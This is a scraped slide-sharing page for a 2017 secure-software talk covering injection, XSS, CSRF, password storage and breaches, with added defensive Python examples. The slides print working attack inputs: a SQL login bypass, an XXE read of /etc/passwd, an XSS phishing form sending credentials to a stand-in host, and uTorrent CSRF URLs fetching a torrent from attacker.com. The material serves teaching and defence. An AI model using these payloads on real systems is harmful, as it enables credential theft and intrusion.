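Two checks a mail gateway or link scanner can run on a domain, as an added example in Python (not code from the slides): flag a label that mixes scripts, and flag a non-ASCII label whose confusable "skeleton" collapses to a known brand (the all-Cyrillic case that the mixed-script rule misses). The Cyrillic look-alikes are constructed, the brand list is the four names on the slide, and the confusables table is a small hand excerpt of Unicode TR39, not the full list.

```python
import unicodedata
from typing import Set

# Added example, not code from the slides. BRANDS and CONFUSABLES are
# constructed excerpts; the look-alike domains in the demo are made up.

BRANDS = {"facebook", "google", "yahoo", "booking"}   # the four on the slide

# Cyrillic letters that render like Latin ones in common fonts -> Latin
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u04cf": "l", "\u0501": "d", "\u051b": "q", "\u051d": "w", "\u0455": "s",
}


def script_of(ch: str) -> str:
    """Coarse script from the Unicode name ('LATIN SMALL LETTER A' -> LATIN)."""
    if ch in "-." or ch.isdigit():
        return "COMMON"
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:
        return "UNKNOWN"


def scripts_in(label: str) -> Set[str]:
    return {script_of(c) for c in label} - {"COMMON"}


def skeleton(label: str) -> str:
    """Map confusable characters to their Latin look-alikes."""
    return "".join(CONFUSABLES.get(c, c) for c in label.lower())


def to_punycode(domain: str) -> str:
    """What actually goes on the wire: an IDN label becomes xn--..., which is
    also what a browser shows once it decides the name is suspicious."""
    return domain.encode("idna").decode("ascii")


def is_homograph(domain: str) -> bool:
    """Flag a domain if any label mixes scripts, or if a non-ASCII label
    collapses to a brand name."""
    for label in domain.split("."):
        if len(scripts_in(label)) > 1:
            return True
        if not label.isascii() and skeleton(label) in BRANDS:
            return True
    return False


if __name__ == "__main__":
    mixed = "f\u0430cebook.com"                  # Latin f, Cyrillic а, Latin cebook
    all_cyrillic = "\u0443\u0430\u04bb\u043e\u043e.com"   # reads "yahoo"
    for d in ("facebook.com", mixed, all_cyrillic):
        print(d, to_punycode(d), is_homograph(d))
```

Browsers apply rules of this kind when deciding whether to display a name as Unicode or as xn-- punycode; the gap the slide points at is that mail clients and social-network link previews often do not, so the same check belongs in whatever renders links to your users.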
The Action Part
London HIV Clinic
•Sent an email with all recipients in “To:” instead of “Bcc:”
•730 of the 781 addresses contained the patients' full names
•Fined £180,000
App needs access?
•Pictures? Videos? Files?
•Calls info? Device ID?
•Wi-Fi networks?
Screenshot: a football app, Friday 17 June (15.00 Italy - Sweden, 18.00 Czech Republic - Croatia, 21.00 Spain - Turkey) with distances of 5.1 km, 9.9 km and 10.9 km
… and probably many more!
The Ashley Madison Data Breach
•9.7 GB user data stolen
•Search engine “Is he cheating on you?”
•32 000 000 user accounts compromised
•Adultery can be punished by death in Saudi Arabia (about 1 200 Saudi Arabian accounts were in the leak)
•2 people committed suicide
•$567 000 000 lawsuit
1. Collect minimum personal information
(fight Marketing if needed)
2. Ensure all collected personal data is properly
protected+encrypted (when stored and in transit)
3. Ensure only authorized individuals have access to
personal information (incl. internally)
4. Be extra careful with logs, error messages, testing
with real data, using it with 3rd parties, etc.
The Action Part
Will my company be hacked?
Yes, eventually!
“It happened before, it will happen
again… It is just a question of when.”
-- Armageddon Movie
Create Responsible Disclosure Policy
“Please email security@mycompany.com to report any
security vulnerabilities”
Organize bug bounty!
See hackerone.com and bugcrowd.com
Choose white hats!
The Black Hat and White Hat Book
Security Testing
Hacking Exposed Series
Links
www.owasp.org
Free Open Source Security Community
www.sans.org
SANS Institute, Certifications
https://cve.mitre.org/
Common Vulnerabilities and Exposures (CVE)
https://www.wired.com/category/security/
News and Updates
To avoid comedy and drama…
The Action Part: Summary
1. Don’t trust user input and always sanitize it
2. Careful with passwords, use 2FA
3. Keep your software updated and secure
4. Encrypt and store securely.
5. Be careful with sensitive data
Thank you!
Peter Sabev
p.sabev@fastlanesoft.com
fb.com/peter.sabev
@BORIME4KA
www.it-weekend.com
www.fastlanesoft.com

Working with UK people (for Bulgarians)
 
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 201510 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015
 
Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015
 
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хораRuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
 

Último

Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfCionsystems
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 

Último (20)

Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdf
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 

Secure Software: Action, Comedy or Drama? (2017 edition)

  • 1. Secure Software: Action, Comedy or Drama? (Edition 2017) Peter Sabev, p.sabev@fastlanesoft.com
  • 2.
  • 3. Who is that man? Giotto (1266-1337) Italian painter and architect
  • 4. The Mourning of Christ (1306) in Cappella degli Scrovegni
  • 5. Pope Benedict XI looking for masters…
  • 6. Creating perfect circles and perfect software is hard! (diagram: "Software as coded" vs. "Intended functionality")
  • 7. Intended vs. Implemented (diagram: "Missing or Incorrect Functionality"; "Side-effect: Most security bugs are here!")
  • 8. I’ll talk about the side effects today…
  • 9. Sometimes bugs are found accidentally… • Logged on to his father's Xbox • Without knowing the password • Bug with leading spaces in the password field
  • 10. Sometimes attacks are on purpose…
  • 11. 2011 Sony PlayStation Network Outage • 23 days outage of all Sony PS3 and PSP consoles • 77 000 000 user accounts exposed • Over 12 000 credit card numbers stolen • Outage costs were officially $171 000 000
  • 12.
  • 13. Some Facts and Numbers
    97% of scanned Java apps in 2015 had code quality errors
    95% of mobile apps were vulnerable
    90% of web apps have security vulnerabilities
    87% of PHP applications have vulnerable security functions
    43% of developers released apps with known vulnerabilities
    39% increase of vulnerabilities in the last 5 years
    10% of applications still have hard-coded passwords
    Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016, Capgemini; The Impact of Security on Development, Prevoty
  • 14. OWASP Top 10 Vulnerabilities 2017-RC2 CWE/SANS Top 25 Most Dangerous Software Errors
  • 15. The most important vulnerabilities combined into 5 titles: 1. Insecure Interface 2. Insufficient Authentication 3. Security Misconfiguration 4. Lack of Transport Encryption 5. Privacy Concerns
  • 16. 1. Insecure Interface • Code Injections (SQLi, XXE) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
  • 17. THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE. YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS AND SOFTWARE THAT YOU OWN. PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS THAT YOU DO NOT OWN IS ILLEGAL.
  • 18. SQL Injection explained in 3 steps:
    1. Imagine the following piece of code:
       String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
    2. Setting username to Peter & password to ' OR '1'='1 produces:
       SELECT * FROM user WHERE name = 'Peter' AND pass='' OR '1'='1'
    3. '1'='1' is always true, so Peter is logged in without a password.
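Added example (my own Python, not code from the deck): the same three steps against an in-memory SQLite table, with the parameterized query that the "Action Part" summary later recommends beside the concatenated one. The table, the stored password and the function names are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the slide's "user" table: one row, demo password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO user VALUES ('Peter', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Step 1: the same string concatenation as the Java snippet on the slide.
    # User input becomes part of the SQL text, so a quote inside it ends the
    # string literal and whatever follows is executed as SQL.
    sql = ("SELECT * FROM user WHERE name = '" + username
           + "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The fix: placeholders. The values travel separately from the statement,
    # so a quote in the password is compared as data and never parsed as SQL.
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run both logins with the real password and with the slide's step 2 string."""
    conn = make_db()
    bypass = "' OR '1'='1"   # step 2: the password from the slide
    return {
        "vulnerable, real password": login_vulnerable(conn, "Peter", "s3cret"),
        "vulnerable, bypass string": login_vulnerable(conn, "Peter", bypass),
        "parameterized, real password": login_parameterized(conn, "Peter", "s3cret"),
        "parameterized, bypass string": login_parameterized(conn, "Peter", bypass),
    }


if __name__ == "__main__":
    for case, logged_in in demo().items():
        print(f"{case}: logged in = {logged_in}")
```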
  • 20.
  • 21. Injection does not need to be SQL…
  • 22. It does not need to be front-end either…
  • 23. It can be even in <Injected Malicious Code>
  • 24. It can be even in Problem: • Checked MIME type only • Fixed 8+ times until fully resolved (05/2016) • Vulnerabilities up to now: 403!!! (11/2017) • https://imagetragick.com/
  • 25. Popular vulnerability in 2017: XML External Entity (XXE) Processing
    1. Application parses XML documents.
    2. The XML processor is configured to validate and process/resolve the document type declaration (DTD):
       <?xml version="1.0" encoding="ISO-8859-1"?>
       <!DOCTYPE foo [ <!ELEMENT foo ANY >
       <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
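Added example, not from the slides: a Python parser on the standard library's expat bindings that refuses the DTD the payload above depends on (step 2 of the slide is exactly the configuration to avoid), with the slide's document reproduced as constructed test input. The class and function names are my own.

```python
import xml.parsers.expat

# Constructed test inputs: the slide's XXE document and a harmless one.
XXE_DOC = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    '<!DOCTYPE foo [ <!ELEMENT foo ANY > '
    '<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>'
)
SAFE_DOC = '<?xml version="1.0"?><order><item sku="A1">2</item></order>'


class DtdNotAllowed(Exception):
    """Raised for any document carrying a document type declaration."""


def parse_without_dtd(doc: str) -> list:
    """Return [(tag, attributes), ...] for every element, refusing any DTD."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires on "<!DOCTYPE ...", before any <!ENTITY ...> inside it is seen,
        # so no entity is ever declared, let alone resolved.
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

    def on_external_entity(context, base, system_id, public_id):
        # Second line of defence: returning 0 makes expat abort with an error
        # instead of fetching system_id (the file:///etc/passwd of the slide).
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda tag, attrs: elements.append((tag, dict(attrs)))
    parser.Parse(doc, True)
    return elements


def rejects_dtd(doc: str) -> bool:
    """True if the parser refused the document because it carries a DTD."""
    try:
        parse_without_dtd(doc)
    except DtdNotAllowed:
        return True
    return False


if __name__ == "__main__":
    print("safe document:", parse_without_dtd(SAFE_DOC))
    print("XXE document rejected:", rejects_dtd(XXE_DOC))
```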
  • 26. 2. Cross Site Scripting (XSS) explained
    Put the following code in a search field, edit box or another text component:
    <script>alert('XSS')</script>
  • 27.
  • 28.
  • 29. Funny image or banner ad? <img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg" width="80%">
  • 30.
  • 31. Entire login form that tricks the user? This video is Hilarious..... worth every second'<br><br>To see the search results, please login with the form below before proceeding:<form action="http://myhackersite.com/destination.php"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form><br/><br/><br/><br/><br/><br/>
  • 32.
  • 33. The link to distribute is a little bit long… http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hilarious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see%20the%20search%20results%2C%20please%20login%20with%20the%20form%20below%20before%20proceeding%3A%3Cform%20action%3D%22http%3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E
  • 34. But that is what URL shortening services are for… Here is your phishing URL: http://bit.ly/25zaEyy
  • 36. 3. Cross-Site Request Forgery (CSRF) causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
  • 37. 3 Easy Steps for uTorrent CSRF Exploit (2008)
    1. Turn on the "Move completed downloads" option: http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=
  • 38. 3 Easy Steps for uTorrent CSRF Exploit (2008)
    2. Change the path of completed downloads to the Windows startup folder: http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup
  • 39. 3 Easy Steps for uTorrent CSRF Exploit (2008)
    3. Provide a link to a torrent containing a .bat file and malware to the end user: http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
  • 41. The Action Part (XSS&CSRF)
    X-Frame-Options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    Regenerate cookies after login.
    Check the IP address (or even contain it in cookies)
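Added example (my own Python, not the presenter's code) of the action items above: a response builder that sets the three headers and HTML-escapes the search term the earlier XSS slides abused, plus a handler for a state-changing action modelled on the uTorrent setsetting URL that requires a session-bound CSRF token and a matching Origin. The key, session id and origins are constructed for the demo.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import parse_qs

SECRET_KEY = secrets.token_bytes(32)   # per-deployment key, generated at start-up

SECURITY_HEADERS = {                    # the three headers from the slide
    "X-Frame-Options": "DENY",            # never allow framing of the UI
    "X-Content-Type-Options": "nosniff",  # browser must not guess a script type
    "X-XSS-Protection": "1; mode=block",  # legacy filter, still cheap to send
    "Content-Type": "text/html; charset=utf-8",
}


def render_search(term: str) -> tuple:
    """Return (headers, body) for the search page; untrusted input is escaped."""
    # html.escape turns < > & " ' into entities, so the <script>, <img> and
    # <form> payloads from the XSS slides are displayed as text, not executed.
    body = f"<h1>Results for: {html.escape(term)}</h1>"
    return dict(SECURITY_HEADERS), body


def csrf_token(session_id: str) -> str:
    """Synchronizer token: an HMAC of the session id under the server key."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_setsetting(session_id: str, origin: str, own_origin: str, body: str) -> str:
    """State change (like uTorrent's setsetting) accepted as a POST body, not a GET URL.

    A forged request from another site carries the victim's cookie, hence the
    session_id, but it cannot read the token and cannot fake its own Origin.
    """
    if origin and origin != own_origin:
        return "rejected: cross-origin request"
    form = parse_qs(body)
    token = form.get("token", [""])[0]
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return "rejected: missing or invalid CSRF token"
    return f"applied {form['s'][0]}={form['v'][0]}"


if __name__ == "__main__":
    sid, own = "session-123", "http://localhost:14774"   # constructed
    print(render_search("<script>alert('XSS')</script>")[1])
    good = f"s=dir_completed_download_flag&v=1&token={csrf_token(sid)}"
    print(handle_setsetting(sid, own, own, good))
    print(handle_setsetting(sid, "http://www.attacker.com", own,
                            "s=dir_completed_download_flag&v=1"))
```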
  • 42. The Action Part (Summary)
    1. Trust no user input. Never. Ever!
    2. Sanitize input and process only 100% trustworthy data.
    3. Use parameterized queries and stored procedures.
    4. Test! There are many scanners for SQLi, XSS, CSRF, etc.
  • 43. Penetration Testing Tools
    OWASP ZAP (Zed Attack Proxy)
    Nikto
    Nmap
    Acunetix
    Bishop Vulnerability Scanner (Chrome plugin)
    Firebug (Firefox plugin)
    HP Scrawlr & HP Webinspect
    Havij Pro
    Sqlmap
  • 44.
  • 46. Which is the most popular password? 123456 / password / 12345678 / qwerty / password
  • 50.
    • 9.8% have the passwords password, 123456 or 12345678;
    • 14% have a password from the top 10 passwords
    • 40% have a password from the top 100 passwords
    • 79% have a password from the top 500 passwords
    • 91% have a password from the top 1 000 passwords
    • 98.8% have a password from the top 10 000 passwords
  • 51. The Action Part
    1. Limit login attempts.
    2. Add password length and character requirements.
  • 52. … and the “big difference”: The 3 most popular passwords now hold “only” 1,2% of all passwords:
    • Password1
    • Hello123
    • Welcome1
    Source: TrustWave
  • 53. The Action Part
    1. Limit login attempts.
    2. Add password length and character requirements.
    3. Password encryption
  • 54. The Worst Option: Unencrypted Password
    <server>
      <id>my.server</id>
      <username>admin</username>
      <password>Welcome1</password>
    </server>
  • 55. Still Bad Option: Shift ASCII Code or Similar*
    <server>
      <id>my.server</id>
      <username>admin</username>
      <password>Zhofrph4</password>
    </server>
    * There was a hot dispute in a developer’s forum whether shift by 5 or shift by 12 is better
  • 56. Better Option: Use MD5 hash (with salt!!!)
    <server>
      <id>my.server</id>
      <username>admin</username>
      <password>{b56e0b4ea4962283bee762525c2d490f}</password>
    </server>
  • 57. Even better option - Bcrypt
    <server>
      <id>my.server</id>
      <username>admin</username>
      <password>{$2a$08$zr8EtKWwENQBAztAp3o0FO5Tbc69RuJrm6GvPhJKOZr/PNkaZKxE2}</password>
    </server>
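Added example (my own Python, not the presenter's): undoing the slide 55 shift for Zhofrph4, showing why slide 56 insists on a salt, and a hash/verify pair in the {...} record style of the slides. bcrypt is not in the Python standard library, so PBKDF2-HMAC-SHA256 stands in for it here; it plays the same role of a salted, deliberately slow hash with a tunable work factor.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # work factor (bcrypt's cost plays the same role); raise over time


def shift_ascii(text: str, shift: int) -> str:
    """Slide 55's 'encryption': rotate each printable ASCII character.

    Welcome1 with shift 3 gives Zhofrph4, and shift -3 gives it straight back,
    so anyone holding the config file holds the password.
    """
    return "".join(chr((ord(c) - 32 + shift) % 95 + 32) for c in text)


def unsalted_md5(password: str) -> str:
    """Without a salt, equal passwords give equal hashes for every user, so one
    precomputed table of common passwords cracks all of them at once."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None) -> str:
    """Return a {pbkdf2_sha256$iterations$salt$digest} record with a fresh random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "{pbkdf2_sha256$%d$%s$%s}" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.strip("{}").split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(shift_ascii("Zhofrph4", -3))          # the slide's value, undone
    record = hash_password("Welcome1")
    print(record, verify_password("Welcome1", record))
```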
  • 58. The Action Part
    1. Limit login attempts.
    2. Add password length and character requirements.
    3. Password encryption
    4. Password recovery
  • 61. The Action Part
    1. Limit login attempts.
    2. Add password length and character requirements.
    3. Password encryption
    4. Password recovery
    5. Protect against non-human intervention (captcha)
  • 64. Slack’s DB got stolen and hacked (05’2015)
  • 65. LinkedIn got hacked (2012) • 164 million accounts stolen • Account info sold now on black market • Check haveibeenpwned.com for your account  • There are concerns even for the current fixes
  • 66. The Problem: One-Factor Authentication Something that you know
  • 67. Two-Factor Authentication: Something that you know + Something that you have
  • 68. Three-Factor Authentication: Something that you know + Something that you have + Something that you are
  • 69. Use two or three factor authentication (at least for important stuff) The Real Action Part
  • 70.
  • 71. Distributed Denial of Service (DDoS) • TV Show (10000s people visit your site) • Early days: ICQ • Nowadays: Malware (diagram: Real Attacker, Master, five Daemons, Victim)
  • 72. The Action Part 1. Invest in hardware
  • 73. Worse than DDoS: Ransomware • Biggest problem of 2016 and 2017 • Usually encrypts the files so they become unusable • Wants money to be paid (usually in untrackable BTC)
  • 74. The Action Part 1. Invest in hardware 2. Backup and Recovery Plans
  • 75.
  • 76. The Action Part 1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding
